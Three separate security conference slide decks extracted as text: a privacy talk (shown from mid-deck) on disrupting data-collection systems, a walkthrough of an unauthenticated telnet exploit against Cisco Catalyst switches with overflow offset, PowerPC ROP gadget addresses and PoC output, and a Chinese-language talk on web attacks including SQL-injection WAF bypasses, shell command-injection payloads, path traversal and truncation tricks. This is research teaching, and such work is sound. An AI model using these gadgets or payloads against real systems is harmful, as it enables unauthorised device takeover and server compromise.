Credit Card – Grocery Rewards – Mailing Lists from Businesses – Etc. The Hacker Pimps The Hexagon Security Group Inferred Data ● An inference made from collected data. ● Less accurate than aggregated data. ● Often inferences can be wrong, such as: – Example: You buy multiple packs of Sudafed, so you must be cooking Meth. – Example: You drive through bad parts of town, so you must be buying drugs. The Hacker Pimps The Hexagon Security Group A Step Further ● What if a profile of you was created from this collected data both aggregated and inferred. ● Think back to the previous slide about “what you are”, a couple theoretical situations: – Statistics could show that since you watch certain shows, download porn, and have diabetes that you are 30% more likely to kill someone. – 40% more likely to be guilty of domestic violence. ● Do you really want data like this in the hands of people that can't protect it anyway? The Hacker Pimps The Hexagon Security Group Eating Your Own Cake ● You can't freely share information, and expect to keep it private. – Social networks, blogs, etc. – Public Resumes and CVs. ● Even using an alias can be dangerous. ● Decide what you want people to know about you, and make it public. The Hacker Pimps The Hexagon Security Group So How Does It Work? The Hacker Pimps The Hexagon Security Group Recognition Technologies ● Traditional Biometrics ● Also, linguistics and web habits. – MS is working on technology to identify you through your web habits. ● If this technology is widespread it could be next to impossible to correct inaccuracies. The Hacker Pimps The Hexagon Security Group Scary S#!7 The Hacker Pimps The Hexagon Security Group It's Only Going To Get Worse ● Your information is big business $$$ – Not just your personal information but psudo-profile information as well. ● Computers need to learn to forget. – Viktor Mayer-Schönberger – Useful Void: The Art of Forgetting in the Age of Ubiquitous Computing ● Not to mention all of this affects our freedom of speech. The Hacker Pimps The Hexagon Security Group Future Connected Technologies ● Just think if your home could talk, all of the things it could say about you. In the future, it will talk and probably not to who you want it to. ● Future connected homes are going to become a hotbed for embedded spyware. It is inevitable. – Connected Devices and appliances = Collected Information ● We did an entire presentation on this at Hope Number Six last year. The Hacker Pimps The Hexagon Security Group Future Connected Technologies ● We freely give away our rights when we agree to the user agreement. ● We allow companies to spy on us. ● Unless we refuse to use their items, this trend will not change. ● We need to start looking at new technology as researchers and not as simple users if we care about our information. The Hacker Pimps The Hexagon Security Group System Models ● My Co-workers Philosophy about computers – Way too simple, but we can start there anyway – The basics of a system ● Input – Processing – Output Input Processing Output Now lets expand on this a bit The Hacker Pimps The Hexagon Security Group Slightly Expanded Model ● Let's add a couple of components – Method – Storage – Who does the output go to Input Processing Output Method Who Storage The Hacker Pimps The Hexagon Security Group Analyzing These Systems ● Analysis is the first step to mitigating the effects from these systems. ● Items that will affect your continued efforts will be determined by a couple of factors: – Is this installed software? – Is this black box technology? – System out of your control? The Hacker Pimps The Hexagon Security Group Analyzing These Systems ● It is not necessary to know all the pieces of the puzzle. ● Know your devices and software. ● What do you have to work with? – These systems are going to have to have interface with you. – It may only take one interface to make an attack surface. The Hacker Pimps The Hexagon Security Group Installed Software ● Read EULA and associated documentation. ● Remember, this is installed on your system. ● What does the software do (its intended purpose)? – Inventory these purposes. – Now what is it doing on your machine? ● Compare the purpose with the actions it is taking on your system. The Hacker Pimps The Hexagon Security Group Installed Software ● Concerns – What files / parts of the computer is it accessing? ● Why? Is it a function of that application? – Did it scatter pieces of itself all over – Is it sending information to a 3rd party? The Hacker Pimps The Hexagon Security Group Installed Software ● Use tools at your disposal to analyze behavior of software. Remember, you have full access to the system. ● Communications – If software is spying on you it is going to send the data somewhere. – Where is it sending data? – What protocol is it using? – What is the format of the data? The Hacker Pimps The Hexagon Security Group Installed Software ● File Access – What files does the software access? – Is it expected to access those files? ● Tools to use – Network (Wireshark, TCPdump, etc.) – File Access (lsof, filemon, etc.) ● Is the software open source? – Look at the code or find someone with an analysis that did. The Hacker Pimps The Hexagon Security Group Installed Software ● Research the web for known issues. ● Keep in mind the installed software most likely has access to all of the information on your computer. The Hacker Pimps The Hexagon Security Group Black Box Analysis ● Read agreements and other documentation. ● Know the device. – What is the function of the device? – What medium does it use to transfer data? – What interfaces does it have? ● What type of information does the black box have access to? – Remember it doesn't have to be Credit Card data to be important. The Hacker Pimps The Hexagon Security Group Black Box Analysis ● Is there a way visually or audibly observe behavior? – Activity lights, Hard drive activity, etc. – Are there times when this activity can be observed being heavier than usual while certain functions are being performed? ● Can you put a device on the medium to listen for communication? ● Does it have other interfaces that can be messed with? The Hacker Pimps The Hexagon Security Group Black Box Example ● A Cable Box with a built in DVR ● Information – Has access to television and movie data you watch. ● Real-time and recorded. – Your schedule. ● Would know when you are home and when you are away. ● Medium to transfer data. – Transfers data over coaxial cable. The Hacker Pimps The Hexagon Security Group Black Box Example ● Has multiple interfaces. – Infrared. – USB – Serial – Multiple Coax inputs – Multiple misc video inputs ● Visual and Audible – Hard drive – Lights The Hacker Pimps The Hexagon Security Group Systems Out Of Your Control ● Read agreements, documentation, warnings, etc. ● Most likely you are going to have a severely lowered surface to work with. ● Identify Interfaces. ● Identify data the system has access to. The Hacker Pimps The Hexagon Security Group Systems Example ● Surveillance system with /detection ● Information Collected – Identification Information – Location Information ● Transfer medium – Wireless? – Ethernet? The Hacker Pimps The Hexagon Security Group Systems Example ● Interfaces – Video Camera (Probably the only one you are going to have access to) The Hacker Pimps The Hexagon Security Group Attacking Systems ● What is the goal of attacking these systems? – Affect integrity – Affect availability – Sometimes confidentiality ● Basically making the system's data so it can't be trusted. ● Simply, sometimes systems can be attacked by just not using them. The Hacker Pimps The Hexagon Security Group The Point of This If a systems data can not be trusted or counted upon, then the system will not be used or rendered ineffective. Bad data + Bad decisions = Unreliable Systems If banks had the tendency to loose your money, would you use them? The Hacker Pimps The Hexagon Security Group A New Way To Look Attacks ● A new classification scheme for attacks on information gathering systems and other systems that invade our privacy. ● This classification scheme can be broken down in to three levels. – Level 1 Attacks – Level 2 Attacks – Level 3 Attacks The Hacker Pimps The Hexagon Security Group Level 1 ● Level 1 Attack: Affects the ability of the input device to perform its function. ● Examples: – Destruction of input device. – Disabling of the input device. – Cause a malfunction under certain conditions. The Hacker Pimps The Hexagon Security Group Level 2 ● Level 2 Attack: Affects the accuracy of the data stored. ● Examples: – Injecting bad data. – Injecting massive amounts of data. ● May overflow the capacity of the storage media. ● Useless data. The Hacker Pimps The Hexagon Security Group Level 3 ● Level 3 Attack: Affects processing decisions of the system. ● Examples: – Falsely triggering events based on algorithms (False Positives) – Bypassing system by not triggering events (False Negatives) The Hacker Pimps The Hexagon Security Group Nice!!! ● Cell phone monitoring anyone? – “Hey, have you heard that new band assassination plot, they're the bomb.” ● I have a friend who seems to have the uncanny ability to work in words such bomb, nuclear, and assassin in every phone conversation we have. The Hacker Pimps The Hexagon Security Group Examples The best way to have a look at this is through some examples. These are very simple examples, many of the systems in the wild will be a lot more complex. The Hacker Pimps The Hexagon Security Group Example 1 ● Simple Security Camera (without an active watch) Movement / Actions Camera DVR TV Human Analysis Data Collected Method / Input Storage Output Processing / Analysis The Hacker Pimps The Hexagon Security Group Example 1 ● Most likely attack would be on the input device. (Level 1) ● Can the input device be taken out? – Destroyed – Blinded ● The data stored could also be attacked. (Level 2) – Dress up in a suit like a giant banana The Hacker Pimps The Hexagon Security Group Example 2 ● Security Camera (with intelligence) Movement / Actions Camera Monitor Human Follow-up Computer Data Collected Method / Input Output / Alert Analyzes data based on behavior The Hacker Pimps The Hexagon Security Group Example 2 ● Can the input device be taken out? (Level 1) – Destroyed – Blinded ● What behavior triggers an event? (Level 3) – Falsely trigger events The Hacker Pimps The Hexagon Security Group Example 3 ● RFID Passport Personal Identifying Scanner Computer Monitor Human Follow-up Central Database Method / Input Data Collected The Hacker Pimps The Hexagon Security Group Example 3 ● What if 1 out of every 5 passports wouldn't read. – Frying the passport (Level 1) ● What if 1 out of every 20 had wrong information. – Injecting bad data (Level 2) ● Think about the availability of frequent travelers. ● Think of the impact that would have The Hacker Pimps The Hexagon Security Group Example 4 ● Stealth Retina scanning at a department store to identify those pesky customers that pay cash. Personal Identifying Scanner Computer Report Marketing / Ordering Central Database Method / Input Data Collected Central Storage Decisions based on behavior Output The Hacker Pimps The Hexagon Security Group Example 4 ● Just be cool – Wear sunglasses inside the store (Level 1) – Don't shop at the fscking store anymore (Level 1) The Hacker Pimps The Hexagon Security Group So What Can You Do? ● Avoid using systems that collect data about you. ● Encrypt communications and ensure you are communicating with who you think you are. ● Analyze systems you have and filter unwanted traffic. ● Contact companies and tell them you refuse to use their services anymore, unless they change. The Hacker Pimps The Hexagon Security Group So What Can You Do? ● Use a new discount card every time. – Or only use discount card when it is really funny for tampons and douches – Interesting new trend in discount cards ● Minimize use of credit card. ● Leave as little data as possible behind. ● Use encryption when instant messaging. ● Use encryption for Email. The Hacker Pimps The Hexagon Security Group So What Can You Do? ● Analyze new toys for potential issues. – Possible backdoor accounts – Possible hidden communication ● Beware of any technology that can track you or put you in a given place at a certain time. ● Intrusive stores should be avoided. The Hacker Pimps The Hexagon Security Group So What Can You Do? ● Remember, at first always view the next big thing or the newest gadget as a threat. – Move on when you have verified The Hacker Pimps The Hexagon Security Group The False Life Project ● The False Life Project is a project to open lines of communication and discuss defeating behavioral based analysis. – People knowing what and who we are. ● Build tools to implement ideas discussed in the project. ● Increase privacy. ● http://falselife.hackerpimps.com The Hacker Pimps The Hexagon Security Group Sysmin Sys73m47ic sysmin{at}neohaxor{dot}org Marklar marklar51{at}gmail{dot}com The Hacker Pimps www.hackerpimps.com The Hexagon Security Group www.hexsec.com
pdf
Cisco Catalyst Exploitation Artem Kondratenko @artkond Whoami -Penetration tester @ Kaspersky Lab -Hacker -OSC(P|E) -Skydiver ;) Long story short • On March 26th 2017 Cisco announces that numerous models of switches are vulnerable to unauthenticated remote code execution vulnerability • No signs of exploitation in the wild • No exploit available Cisco advisory Cisco advisory Vendor advice: Disable telnet Disable telnet folks • Telnet is an old legacy protocol Disable telnet folks • Telnet is an old legacy protocol • SSH has been around for decades – a secure replacement for telnet Disable telnet folks • Telnet is an old legacy protocol • SSH has been around for decades – a secure replacement for telnet • Even more: according to the advisory, using telnet on a catalyst switch might be simple way for the attacker fully compromise the switch Still not convinced • No public exploit • No knowledge of in-the-wild exploitation • Critical-shmitical, should we even care? Public sources for researching the vulnerability • Cisco advisory • Vault 7 leak Vault 7: Hacking Tools Revealed Hacking techniques and potential exploit descriptions for multiple vendors. This was the source Cisco Systems used for their research on the advisory released on March 26th Cisco switch exploit Codename: ROCEM Cisco switch exploit Codename: ROCEM Cisco switch exploit Codename: ROCEM Rocem: Modes of Interaction • Set • Run exploit to set credless authentication • Unset • Run exploit to set credentials back in place • Interactive Mode • Exploit the system and present the attacker with shell immediately Easy enough. The perfect plan • Take two switches • Cluster dem switches! • Look for a magic whatever there is in the traffic • ??? • Profit!!! Clustering Cisco switches Controlling Slave-switches from Master $ telnet 192.168.88.10 catalyst1#rcommand 1 catalyst2#show priv Current privilege level is 15 Clustering Catalyst switches Telnet? Clustering Cisco switches: L2 telnet Magic telnet option Telnet Debug log from Vault ROCEM testing notes Telnet commands and options All Hope Is Lost Replaying CISCO_KITS option during generic telnet session doesn’t work L And also... Cisco IPS rule for this vuln is called “Cisco IOS CMP Buffer Overflow” Peeking at firmware The firmware is available at the flash partition of the switch: catalyst2#dir flash: Directory of flash:/ 2 -rwx 9771282 Mar 1 1993 00:13:28 +00:00 c2960-lanbasek9-mz.122- 55.SE1.bin 3 -rwx 2487 Mar 1 1993 00:01:53 +00:00 config.text 4 -rwx 3096 Mar 1 1993 00:09:27 +00:00 multiple-fs Peeking at firmware $ binwalk -e c2960-lanbasek9-mz.122-55.SE1.bin DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 1120x70 bzip2 compressed data, block size = 900k Unpacked binary size is around 30 mb The Reality L Jokes aside • CPU Architecture: PowerPC 32 bit big-endian • Entry point at 0x3000 (obvious during device boot process if you look at it via serial) Discovering functions with IDA python • Nice script by Federico Muttis (aka @acid_) • https://exploiting.wordpress.com/2011/12/06/quickpost- idapython-script-to-identify-unrecognized-functions/ Discovering functions with IDA python Result: ~80k functions discovered ahhh.. the pain of static analysis • No symbols.. Well, of course • The whole OS is a single binary • Indirect function call via function call tables filled at run time Setting up debug environment • There’s no public SDK • Some firmware has a “gdb kernel” command. • Custom gdb server protocol • Unsupported by modern versions of gdb Two options: • Dig up an old gdb version and try to patch it • Use IODIDE (by nccgroup) George Nosenko built an IDA adapter to debug IOS but it’s not public So I patched GDB… IODIDE – the smooth experience Well.. Had to debug IODIDE to be able to debug IOS Hunting for string XREFS After recognizing functions and strings with IDAPython XREFS start to appear: Digging deeper Cluster all telnets! • Telnet code is rather symmetrical • The code for parsing a custom clustering command for client and server side is found in the same function Cluster all telnets! Client side sends a string: «\x03CISCO_KITS\x012::1:» Second string modifier %s – was observed empty in the traffic dump Let’s take a closer look at the code that parses this string Cluster all telnets! • The server portion of the code parses the “CISCO_KITS” options further down the code • And it does it in an interesting manner J Cluster telnet Copying until “:” to the buffer residing on the stack..J Buffalo overflow! Smashing the stack • PowerPC stack frame • Local arguments are placed above the return address • If the buffer boundaries are not checked we get ourselves a typical overflow scenario Smashing the stack Overwriting the return address means the execution flow is now controlled with user input Locating the PC overwrite offset • Cyclic patterns are often used to determine the exact location in the user-supplied buffer that overflows the return address • https://github.com/Gallopsled/pwntools - very nice lib with the ability to generate cyclic patterns PC = 0x64384164 or ‘d8Ad’ in ASCII from pwn import * payload = cyclic_metasploit(200) sock.send(payload) cyclic_metasploit_find(‘d8Ad’) Result: 115 Crash – instruction pointer is overwritten by a DWORD at offset 115 (116th byte) Too easy? • By the book overflow • R9 points to our buffer • No bad chars • Wow, that looks to good to be true • Just overwrite Program Counter with a gadget that jumps to R9 The “jump to r9” gadget 1. Load the contents of register R9 to CTR register 2. Never mind the garbage instruction J 3. ”Branch CTR” instruction transfers the control flow to the address contained in register CTR Doing it like a pro • Just need to place the address of the ”jmp r9” gadget to the place where PC is overwritten • What could possibly go wrong? Fail • Both heap and stack are non-executable. Btw, stack resides on the heap ;) • Device reboots • But why? Is this data execution prevention? • I don’t know • But there’s been research on Cisco devices before • Let’s recall the brilliant presentation @BlackHat by Felix "FX" Lindner • It is suggested that this might happen because of instruction and data caching in PowerPC RETURN ORIENTED PROGRAMMING Return oriented programing: Why? • A technique to bypass DEP (data execution prevention) • In our case we avoid instruction caching Return oriented programing: How does it work? • Use existing code in the binary to achieve your goals • Use stack as the data source for instructions that are used • Chain snippets of code (gadgets) via jmp/call/ret instructions Return oriented programing: How does it work? A candidate gadget must meet two conditions: 1. Execute payload (i.e. reading or writing to some memory) 2. Contain instructions to be able to transfer execution flow to the next gadget Return oriented programing: Limitations • There is only a limited set of gadgets available • Most gadgets modify stack frame. This has to taken into account. Returning execution flow to its original path might be tricky because of this. What kind of action can be performed via ROP? •Arbitrary memory writes ...which might lead to.. •Arbitrary code execution Arbitrary memory writes via ROP The idea is simple: • Find a gadget that loads values from the stack into registers • One value will be used as an address to write to • Another on will be used as a value to be written at that address • Find a second gadget that performs a write operation with those two registers • I.E. write value contained in register r30 to address contained in register r31 One necessary requirement: The gadget should be able to jump to the next gadget or, if it is the last one, properly return the execution flow. In both cases we’re looking for gadgets that do an additional operation consisting of the following primitives: • Take next gadget’s address from the stack • Load it into the Link Register • Jump to the value in the Link Register Gadget chaining to perform arbitrary memory writes Typical function epilog in the firmware Write primitive #1 Write primitive #1 Write primitive #1 1. Move stack by 0x10 2. Jump to next gadget Write primitive #1 Write primitive #2 The result We just wrote arbitrary data to arbitrary address Looking for gadgets • https://github.com/sashs/Ropper Ok, whatever dude... But whatcha gonna write? The plan is: • Find a good place in firmware to patch. It might be: • Control flow • Inner data structures related to authentication • Function pointers The perfect plan First thing that comes to mind – patch the execution flow, responsible for the credential check. Wow... Looks like it worked: $ telnet 192.168.88.10 Trying 192.168.88.10... Connected to 192.168.88.10. Escape character is '^]'. catalyst1> Not quite L Works only under the debugger. Exception is triggered when trying to exploit the live set-up More static analysis • A couple of hours (days?) later... More static analysis • A couple of hours (days?) later... More static analysis • A couple of hours (days?) later... Long story short • Both is_cluster_mode and get_privilege_level are reference indirectly • This means a memory pointer is dereferenced containing the actual function address • We can apply our write-primitives to change this pointer to something we like But why are this funcs important? If is_cluster_mode mode returns a non-zero value then the decision to present a user with shell is only based on privilege level Indirect function calls Got privileges? No creds required Got privileges? No creds required Finish him! • We will overwrite the pointer to is_cluster_mode with a function that always returns 1 • We will overwrite the pointer to get_privilege_level with a funciton that always returns 15 The only thing left is to find suitable gadgets for this 1st gadget 0x000037b4: lwz r0, 0x14(r1) mtlr r0 lwz r30, 8(r1) lwz r31, 0xc(r1) addi r1, r1, 0x10 blr 1. Put ret address into r0 2. Load data pointed by r1+8 into r30 (is_cluster_mode func pointer) 3. Load data pointed by r1+0xc into r31 (address of “ret 1” function) 4. Add 0x10 to stack pointer 5. BLR! We jump to the next gadget 2nd gadget 0x00dffbe8: stw r31, 0x34(r30) lwz r0, 0x14(r1) mtlr r0 lmw r30, 8(r1) addi r1, r1, 0x10 blr 1. Write r31 contents to memory pointer by r30+0x34 2. Move next gadget’s address into r0 3. Junk code 4. Shift stack by 0x10 bytes 5. BLR! Jump to the next gadget 3rd, 4th and 5th gadgets 0x0006788c: lwz r9, 8(r1) lwz r3, 0x2c(r9) lwz r0, 0x14(r1) mtlr r0 addi r1, r1, 0x10 blr 1. r3 = *(0x2c + *(r1+8)) - address of pointer to get_privilege_level func 2. R31 = *(r1 + 8) – r31 conteints address of function that always return 15 3. Overwrite the pointer 0x006ba128: lwz r31, 8(r1) lwz r30, 0xc(r1) addi r1, r1, 0x10 lwz r0, 4(r1) mtlr r0 blr 0x0148e560: stw r31, 0(r3) lwz r0, 0x14(r1) mtlr r0 lwz r31, 0xc(r1) addi r1, r1, 0x10 blr PROFIT! $ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set [+] Connection OK [+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f' [+] Sending cluster option [+] Setting credless privilege 15 authentication [+] All done $ telnet 192.168.88.10 Trying 192.168.88.10... Connected to 192.168.88.10. Escape character is '^]'. catalyst1#show priv Current privilege level is 15 Demo time! Side notes • These switch models are common on pentests • Successfully exploited this vulnerability on real life engagements: • Leak firmware version via SNMP or CDP • Customize exploit for the exact version • Enjoy your shell Further research • Shellcode reliability for multiple firmware versions • Automating the search for suitable ROP gadgets • Finding a way execute arbitrary PPC instructions instead of arbitrary memory writes Stuff to think about • We know that switches find neighbors suitable for clustering using CDP protocol • We know that there might be no authentication in place • We know that the master switch is able to fully control the slave via a privilege 15 shell What if... • We are in the same broadcast segment as the target switch • We craft the necessary CDP packets so the target switch considers us a candidate for clustering • We make an L2 telnet connection asking for a shell simulating the cluster “rcommand” Will this work? • Remains to be seen • Ongoing research Thanks! Check PoC source at: https://github.com/artkond/cisco-rce @artkond artkond.com
pdf
• 蔡政達 a.k.a Orange • CHROOT 成員 / HITCON 成員 / DEVCORE 資安顧問 • 國內外研討會 HITCON, AVTokyo, WooYun 等講師 • 國內外駭客競賽 Capture the Flag 冠軍 • 揭露過 Microsoft, Django, Yahoo, Facebook, Google 等弱 點漏洞 • 專精於駭客⼿手法、Web Security 與網路滲透 #90後 #賽棍 #電競選⼿手 #滲透師 #Web狗 #🐶 – 講 Web 可以講到你們聽不懂就贏了 – 「⿊黑了你,從不是在你知道的那個點上」 – 擺在你眼前是 Feature、擺在駭客眼前就是漏洞 - 別⼈人笑我太瘋癲,我笑他⼈人看不穿 - 猥瑣「流」 Q: 資料庫中的密碼破不出來怎麼辦? 第三⽅方內 容安全 前端 安全 DNS 安全 Web應⽤用 安全 Web框架 安全 後端語⾔言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 XSS XXE SQL Injection CSRF 第三⽅方內 容安全 前端 安全 DNS 安全 Web應⽤用 安全 Web框架 安全 後端語⾔言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 Struts2 OGNL RCE Rails YAML RCE PHP Memory UAF XSS UXSS Padding Oracle Padding Oracle XXE DNS Hijacking SQL Injection Length Extension Attack ShellShock HeartBleed JSONP Hijacking FastCGI RCE NPRE RCE OVERLAYFS Local Root CSRF Bit-Flipping Attack 第三⽅方內 容安全 前端 安全 DNS 安全 Web應⽤用 安全 Web框架 安全 後端語⾔言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 🌰 - Perl 語⾔言特性導致網⾴頁應⽤用程式漏洞 🌰 @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # ? $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' }; @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # wrong! $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => ('Ba', 'Ba', 'Banana') }; @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # correct! $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' }; my $otheruser = Bugzilla::User->create( { login_name => $login_name, realname => $cgi->param('realname'), cryptpassword => $password }); my $otheruser = Bugzilla::User->create( { login_name => $login_name, realname => $cgi->param('realname'), cryptpassword => $password }); # index.cgi? realname=xxx&realname=login_name&realname= admin - Windows 特性造成網⾴頁應⽤用限制繞過 🌰 • Windows API 檔名正規化特性 - shell.php # shel>.php # shell"php # shell.< • Windows Tilde 短檔名特性 - /backup/20150707_002dfa0f3ac08429.zip - /backup/201507~1.zip • Windows NTFS 特性 - download.php::$data – 講些⽐比較特別的應⽤用就好 • MySQL UDF 提權 - MySQL 5.1 - @@plugin_dir - Custom Dir -> System Dir -> Plugin Dir • 簡單說就是利⽤用 into outfile 建⽴立⺫⽬目錄 - INTO OUTFILE 'plugins::$index_allocation' - mkdir plugins – 對系統特性的不了解會導致「症狀解」 – 講三個較為有趣並被⼈人忽略的特性與技巧 • 問題點 - 未正確的使⽤用正規表⽰示式導致⿊黑名單被繞過 • 範例 - WAF 繞過 - 防禦繞過 - 中⽂文換⾏行編碼繞過網⾴頁應⽤用防⽕火牆規則 http://hackme.cc/view.aspx ?sem=' UNION SELECT(user),null,null,null, &noc=,null,null,null,null,null/*三*/FROM dual-- http://hackme.cc/view.aspx ?sem=' UNION SELECT(user),null,null,null, &noc=,null,null,null,null,null/*上*/FROM dual-- http://hackme.cc/view.aspx ?sem=' UNION SELECT(user),null,null,null, &noc=,null,null,null,null,null/*上*/FROM dual-- %u4E0A %u4D0A ... - 繞過防禦限制繼續 Exploit for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } } exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg &arg[1]=800 &arg[2]=600 for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } } exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg|sleep 7| &arg[1]=800;sleep 7; &arg[2]=600$(sleep 7) for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } } exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg%0A &arg[1]=sleep &arg[2]=7%0A - 繞過防禦限制繼續 Exploit - 駭客透過 Nginx ⽂文件解析漏洞成功執⾏行 Webshell 是 PHP 問題,某⽅方⾯面也不算問題(?)所也沒有 CVE PHP 後⾯面版本以 Security by Default 防⽌止此問題 差不多是這種狀況 http://hackme.cc/avatar.gif/foo.php ; Patch from 80sec if ($fastcgi_script_name ~ ..*/.*php) { return 403; } http://www.80sec.com/nginx-securit.html It seems to work http://hackme.cc/avatar.gif/foo.php But ... http://hackme.cc/avatar.gif/%0Afoo.php NewLine security.limit_extensions (>PHP 5.3.9) • 問題點 - 對資料不了解,設置了錯誤的語系、資料型態 • 範例 - ⼆二次 SQL 注⼊入 - 字符截斷導致 ... - 輸⼊入內容⼤大於指定形態⼤大⼩小之截斷 $name = $_POST['name']; $r = query('SELECT * FROM users WHERE name=?', $name); if (count($r) > 0){ die('duplicated name'); } else { query('INSERT INTO users VALUES(?, ?)', $name, $pass); die('registed'); } // CREATE TABLE users(id INT, name VARCHAR(255), ...) mysql> CREATE TABLE users ( -> id INT, -> name VARCHAR(255), -> pass VARCHAR(255) -> ); Query OK, 0 rows affected (0.00 sec) mysql> INSERT INTO users VALUES(1, 'admin', 'pass'); Query OK, 1 row affected (0.00 sec) mysql> INSERT INTO users VALUES(2, 'admin ... x', 'xxd'); Query OK, 1 row affected, 1 warning (0.00 sec) mysql> SELECT * FROM users WHERE name='admin'; +------+------------------+------+ | id | name | pass | +------+------------------+------+ | 1 | admin | pass | | 2 | admin | xxd | +------+------------------+------+ 2 rows in set (0.00 sec) name: admin ... x [space] x 250 CVE-2009-2762 WordPress 2.6.1 Column Truncation Vulnerability - CREATE TABLE users (id INT, name TEXT, ...) CVE-2015-3440 WordPress 4.2.1 Truncation Vulnerability - Unicode 編碼之截斷 🍊 $name = $_POST['name']; if (strlen($name) > 16) die('name too long'); $r = query('SELECT * FROM users WHERE name=?', $name); if (count($r) > 0){ die('duplicated name'); } else { query('INSERT INTO users VALUES(?, ?)', $name, $pass); die('registed'); } // CREATE TABLE users(id INT, name VARCHAR(255), ...) DEFAULT CHARSET=utf8 mysql> CREATE TABLE users ( -> id INT, -> name VARCHAR(255), -> pass VARCHAR(255) -> ) DEFAULT CHARSET=utf8; Query OK, 0 rows affected (0.00 sec) mysql> INSERT INTO users VALUES(1, 'admin', 'pass'); Query OK, 1 row affected (0.01 sec) mysql> INSERT INTO users VALUES(2, 'admin🍊x', 'xxd'); Query OK, 1 row affected, 1 warning (0.00 sec) mysql> SELECT * FROM users WHERE name='admin'; +------+-------+------+ | id | name | pass | +------+-------+------+ | 1 | admin | pass | | 2 | admin | xxd | +------+-------+------+ 2 rows in set (0.00 sec) name: admin🍊x 🍊🐱🐶🐝💩 CVE-2013-4338 WordPress < 3.6.1 Object Injection Vulnerability CVE-2015-3438 WordPress < 4.1.2 Cross-Site Scripting Vulnerability - 錯誤的資料庫欄位型態導致⼆二次 SQL 注⼊入 #靠北⼯工程師 10418 htp://j.mp/1KiuhRZ $uid = $_GET['uid']; if ( is_numeric($uid) ) query("INSERT INTO blacklist VALUES($uid)"); $uids = query("SELECT uid FROM blacklist"); foreach ($uids as $uid) { show( query("SELECT log FROM logs WHERE uid=$uid") ); } // CREATE TABLE blacklist(id TEXT, uid TEXT, ...) $uid = $_GET['uid']; if ( is_numeric($uid) ) query("INSERT INTO blacklist VALUES($uid)"); $uids = query("SELECT uid FROM blacklist"); foreach ($uids as $uid) { show( query("SELECT log FROM logs WHERE uid=$uid") ); } // uid=0x31206f7220313d31 # 1 or 1=1 sql_mode = strict utf8mb4 • 問題發⽣生情境 - 使⽤用多個網⾴頁伺服器相互處理 URL ( 如 ProxyPass, mod_jk... ) http://hackme.cc/jmx-console/ http://hackme.cc/sub/.%252e/ jmx-console/ Deploy to GetShell • workers.properti es - worker.ajp1.port= 8009 - worker.ajp1.host= 127.0.0.1 - worker.ajp1.type= ajp13 • uriworkermap.pro perties - /sub/*=ajp1 - /sub=ajp1 http://hackme.cc/sub/../jmx-console/ Apache http://hackme.cc/sub/../jmx-console/ not matching /sub/*, return 404 http://hackme.cc/sub/.%2e/jmx-console/ Apache http://hackme.cc/sub/.%252e/jmx-console/ http://hackme.cc:8080/sub/.%2e/jmx-console/ JBoss http://hackme.cc:8080/sub/../jmx-console/ mod_jk • HITCON 2014 CTF - 2 / 1020 解出 • 舊版 ColdFusion 漏洞 - ColdFusion with Apache Connector - 舊版本 ColdFusion Double Encoding 造成資訊洩漏 漏洞 http://hackme.cc/admin%252f %252ehtaccess%2500.cfm Apache http://hackme.cc/admin/.htaccess <FilesMatch "^\.ht">, return 403 Apache http://hackme.cc/admin%252f.htaccess /admin%2f.htaccess not found, return 404 http://hackme.cc/admin%2f.htaccess Apache http://hackme.cc/admin%252f.htaccess%2500.cfm End with .cfm, pass to ColdFusion http://hackme.cc/admin%2f.htaccess%00.cfm ColdFusion http://hackme.cc/admin/.htaccess .cfm http://hackme.cc/admin%2f.htaccess%00.cfm
pdf
